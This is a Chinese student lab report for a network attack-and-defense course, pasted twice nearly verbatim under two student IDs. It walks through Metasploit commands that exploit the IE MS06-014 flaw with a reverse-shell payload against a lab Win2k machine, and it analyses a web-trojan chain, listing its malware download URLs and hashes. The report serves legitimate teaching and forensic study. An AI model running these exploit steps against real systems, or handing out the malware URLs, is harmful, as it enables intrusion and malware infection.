76
社区成员
发帖
与我相关
我的任务
分享20222941 2021-2022-2 《网络攻防实践》实践十一报告
1.实践内容
1.知识前置
1.1XXTEA
又称Corrected Block TEA,是XTEA的升级版,微型加密算法(Tiny Encryption Algorithm,TEA)是一种易于描述和执行的块密码,通常只需要很少的代码就可实现。其设计者是剑桥大学计算机实验室的大卫·惠勒与罗杰·尼达姆。TEA算法每一次可以操作64bit(8byte),采用128bit(16byte)作为key,算法采用迭代的形式,推荐的迭代轮数是64轮,最少32轮。为解决TEA算法密钥表攻击的问题,TEA算法先后经历了几次改进,从XTEA到BLOCK TEA,直至最新的XXTEA。
1.2base64
Base64是一种编码算法,它利用6bit字符表达了原本的8bit字符,相比8bit的字符编码,Base64的编码多占用1/3的字节长度,以此实现更好的兼容性。第一个特点是其只是一种编码方式,不属于加密算法,一般不用于加密,因为不安全,可以通过base64表推算,但是一般加密后的数据用base64表示,第二个是编码后末尾可能有=号(两个0用=表示)
1.3网页木马
网页木马就是表面上伪装成普通的网页文件或是将恶意的代码直接插入到正常的网页文件中,当有人访问时,网页木马就是会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
2.实践过程
实践一使用Metasploit利用 MS06-014漏洞进行渗透攻击,完成能够在攻击机上进行对靶机的操作;实践二则需要通过不断的分析文件找到网址最后利用IDAPro分析最终得到的exe文件来判断类别和攻击方式等;实践三则是在实践一的基础上完成不同主机间的攻击并简单分析。
任务一:web浏览器渗透攻击
1.查看Win2k和kali的IP地址,之后互相ping一下,发现可以ping通继续下一步:
2.之后输入msfconsole启动Metasploit,再输入search MS06-014
3.使用攻击模块输入命令:use exploit/windows/browser/ie_createobject,之后设置攻击机的IP和靶机IP,
命令分别是:set Lhost 192.168.200.15和set RHOST192.168.200.124,再输入show payloads查看
4.之后利用:set payload windows/shell/reverse_tcp利用该模块进行攻击,回车之后再输入run开始
5.将生成的网址:http://192.168.200.15:8080/rZYoqeyR70syTV 复制到win2k的浏览器打开,显示以下成功:
6.之后输入sessions -i 1,再按一次回车,输入ipconfig发现可以在kali上对其win2k进行操作,成功!
任务二:取证分析实践—网页木马攻击场景分析
1.用记事本打开start.html方便查看,寻找new09.htm
20221919 2021-2022-2 《网络攻防实践》实践十一报告
20221919陈笑宇2023-05-22 16:53:41
1.实践内容
1.知识前置
1.1XXTEA
又称Corrected Block TEA,是XTEA的升级版,微型加密算法(Tiny Encryption Algorithm,TEA)是一种易于描述和执行的块密码,通常只需要很少的代码就可实现。其设计者是剑桥大学计算机实验室的大卫·惠勒与罗杰·尼达姆。TEA算法每一次可以操作64bit(8byte),采用128bit(16byte)作为key,算法采用迭代的形式,推荐的迭代轮数是64轮,最少32轮。为解决TEA算法密钥表攻击的问题,TEA算法先后经历了几次改进,从XTEA到BLOCK TEA,直至最新的XXTEA。
1.2base64
Base64是一种编码算法,它利用6bit字符表达了原本的8bit字符,相比8bit的字符编码,Base64的编码多占用1/3的字节长度,以此实现更好的兼容性。第一个特点是其只是一种编码方式,不属于加密算法,一般不用于加密,因为不安全,可以通过base64表推算,但是一般加密后的数据用base64表示,第二个是编码后末尾可能有=号(两个0用=表示)
1.3网页木马
网页木马就是表面上伪装成普通的网页文件或是将恶意的代码直接插入到正常的网页文件中,当有人访问时,网页木马就是会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
2.实践过程
实践一使用Metasploit利用 MS06-014漏洞进行渗透攻击,完成能够在攻击机上进行对靶机的操作;实践二则需要通过不断的分析文件找到网址最后利用IDAPro分析最终得到的exe文件来判断类别和攻击方式等;实践三则是在实践一的基础上完成不同主机间的攻击并简单分析。
任务一:web浏览器渗透攻击
1.查看Win2k和kali的IP地址,之后互相ping一下,发现可以ping通继续下一步:
2.之后输入msfconsole启动Metasploit,再输入search MS06-014
3.使用攻击模块输入命令:use exploit/windows/browser/ie_createobject,之后设置攻击机的IP和靶机IP,
命令分别是:set Lhost 192.168.200.15和set RHOST192.168.200.124,再输入show payloads查看
4.之后利用:set payload windows/shell/reverse_tcp利用该模块进行攻击,回车之后再输入run开始
- 将生成的网址:http://192.168.200.15:8080/rZYoqeyR70syTV 复制到win2k的浏览器打开,显示以下成功:
6.之后输入sessions -i 1,再按一次回车,输入ipconfig发现可以在kali上对其win2k进行操作,成功!
任务二:取证分析实践—网页木马攻击场景分析
1.用记事本打开start.html方便查看,寻找new09.htm
2.再打开new09.htm,可以看到网址
3.找一个在线工具,看看这两个网址的MD5
4.这里网址已经被修复了,直接使用压缩包中的文件进行分析,打开1299644.js有以下内容:解码后可以发现,其是经过十六进制加密的,因此可以在网页进行解密;
5.解密后可以看到这个木马群,其应用到的应用程序有“Adodb.Stream”、“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”,分别对应利用了微软数据库访问对象、暴风影音、PPStream和百度搜霸的漏洞。这些都是现在网络用户使用非常频繁的软件,其危害性可见一斑。另外,这个文件还引用三个js文件和一个压缩包(bd.cab,解开后是bd.exe)
6. 再按照说明的提示,对“http://aa.18dd.net/aa/1.js”、“http://aa.18dd.net/aa/b.js”、“http://aa.18dd.net/aa/pps.js”和“http://down.18dd.net/bb/bd.cab”作处理。分别对其进行哈希后可以看到如下:
MD5(http://aa.18dd.net/aa/1.js,32) = 5d7e9058a857aa2abee820d5473c5fa4
MD5(http://aa.18dd.net/aa/b.js,32) = 3870c28cc279d457746b3796a262f166
MD5(http://aa.18dd.net/aa/pps.js,32) = 5f0b8bf0385314dbe0e5ec95e6abedc2
MD5(http://down.18dd.net/bb/bd.cab,32) = 1c1d7b3539a617517c49eee4120783b2
7. 首先对第一个文件1.js进行分析,我们使用文本打开这个文件后,可以看到其是一个16进制编码的文件,因此我们可以使用上述的解密工具对其进行解密,解密后我们可以看到如下信息
8.对这些可执行文件分析:
将压缩包复制到wiXP虚拟机中
之后打开IDA Free选择bf.exe进行分析,string页面中可以看到其会修改 IE、注册表、服务和系统文件还包含很多个木马文件:
9.对这些木马文件进行hash计算,可得;
MD5(http://down.18dd.net/kl/0.exe,32) = f699dcff6930465939a8d60619372696
MD5(http://down.18dd.net/kl/1.exe,32) = 0c5abac0f26a574bafad01ebfa08cbfa
MD5(http://down.18dd.net/kl/2.exe,32) = 7ab83edbc8d2f2cdb879d2d9997dd381
MD5(http://down.18dd.net/kl/3.exe,32) = 6164f8cd47258cf5f98136b9e4164ec0
MD5(http://down.18dd.net/kl/4.exe,32) = c8620b1ee75fd54fbc98b25bd13d12c1
MD5(http://down.18dd.net/kl/5.exe,32) = a23cbbf6c2625dcc89ec5dc28b765133
MD5(http://down.18dd.net/kl/6.exe,32) = 7d023fd43d27d9dc9155e7e8a93b7861
MD5(http://down.18dd.net/kl/7.exe,32) = d6fe161bbf5e81aaf35861c938cb8bd1
MD5(http://down.18dd.net/kl/8.exe,32) = acc2bad4a01908c64d3640a96d34f16b
MD5(http://down.18dd.net/kl/9.exe,32) = 1f627136e4c23f76fa1bb66c76098e29
MD5(http://down.18dd.net/kl/10.exe,32) = c6c24984d53478b51fe3ee2616434d6f
MD5(http://down.18dd.net/kl/11.exe,32) = 248b26c81f565df38ec2b0444bbd3eea
MD5(http://down.18dd.net/kl/12.exe,32) = d59f870b2af3eebf264edd09352645e0
MD5(http://down.18dd.net/kl/13.exe,32) = 2506d70065b0accd2c94a0833846e7d8
MD5(http://down.18dd.net/kl/14.exe,32) = f9a339dc1a9e3e8449d47ab914f89804
MD5(http://down.18dd.net/kl/15.exe,32) = 18f9de3590a7d602863b406c181a7762
MD5(http://down.18dd.net/kl/16.exe,32) = 7d63bd5108983d6c67ed32865fefc27b
MD5(http://down.18dd.net/kl/17.exe,32) = 6536161fd92244f62eaac334c36db897
MD5(http://down.18dd.net/kl/18.exe,32) = 6c8d161464e5be8983f7fa42d5e09177
MD5(http://down.18dd.net/kl/19.exe,32) = 4b8597eeb55c107181bd5eb3aa8bfe3e
实验三:攻防对抗实践—web浏览器渗透攻击攻防
首先选择实验1中的MS06_014漏洞,重复先前步骤,在攻击前打开wireshark监听。执行攻击,获取恶意网站链接http://192.168.11.194:8080/hvoopFi7CjTyqqk,在靶机打开网站
返回攻击机的wireshark,观察从靶机发送给攻击机的信息
也可在浏览器右击查看源代码
追踪TCP流,发现一串很长很长的代码~而且有很多空格
经过反混淆和格式化处理后,得到如下的 JS 代码。
分析得出攻击者使用的漏洞是MS06-014。
3.学习中遇到的问题及解决
问题1:实践二的网页都无法打开
问题1解决方案:使用同学发的压缩包得到文件进行分析
问题2:session之后显示没有连接
问题2解决方案:重启kali,重新设置攻击机和靶机再run
4.实践总结
本次作为最后一次实验完成对浏览器安全攻防实践,学会了使用kali利用漏洞完成对靶机的入侵,实验三还实现了与同学之间不同的主机之间完成攻击,实验二作为一个分析实验,学习到如何对已有的木马等进行分析判断类别和入侵方法。最后感谢网络攻防这门课程让我学习到了很多
...全文
请发表友善的回复…
发表回复
